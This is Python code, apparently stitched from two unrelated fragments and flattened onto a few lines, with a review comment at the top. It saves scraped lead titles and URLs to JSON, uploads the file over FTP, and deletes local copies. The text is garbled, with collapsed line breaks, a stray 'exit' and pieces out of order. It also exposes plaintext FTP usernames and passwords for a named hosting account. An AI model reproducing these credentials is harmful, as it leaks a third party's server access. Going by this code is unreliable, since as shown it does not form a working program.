# NOTE(review): `file` shadows the builtin and ftp.quit() is never sent
# (only close()); the open/close pair would be safer as `with`.
title = lead[0] #print url this_title = title["title"] this_url = url["url"] #print this_url leads_with_keywords[current_url_number] = [] leads_with_keywords[current_url_number].append( {'title': this_title}) leads_with_keywords[current_url_number].append( {'url': this_url}) current_url_number += 1 break current_lead_number += 1 with open('out2_lead.json', 'w') as outfile: json.dump(leads_with_keywords, outfile) exit ftp = FTP_TLS() ftp.set_debuglevel(2) ftp.connect('0000', 0000) ftp.sendcmd("USER user") ftp.sendcmd("PASS password") file = open('out2_lead.json', 'rb') ftp.storbinary('STOR out2_lead.json', file) file.close() ftp.close() os.remove("lead2.json") os.remove("out2_lead.json")
# ftp.login(user='******', passwd='MpV6dwCa') """Beget""" # # ftp = ftplib.FTP('klionp9p.beget.tech', timeout=10) # ftp.login(user='******', passwd='2zFh%Ek3') # GREEN = colorama.Fore.GREEN RESET = colorama.Fore.RESET YELLOW = colorama.Fore.LIGHTYELLOW_EX BLUE = colorama.Fore.LIGHTBLUE_EX # # print(ftp.connect()) # ftp.connect() # ftp.dir() formats = ['.txt', '.html', '.docx', '.htm'] from ftplib import FTP_TLS ftp=FTP_TLS() # ftp.set_debuglevel(2) ftp.connect('klionp9p.beget.tech', 21, timeout=100) ftp.sendcmd('USER klionp9p_lesson') ftp.sendcmd('PASS 3M1l&Mha') ftp.cwd('klionp9p.beget.tech') # ftp.dir() # ftp.retrlines('LIST')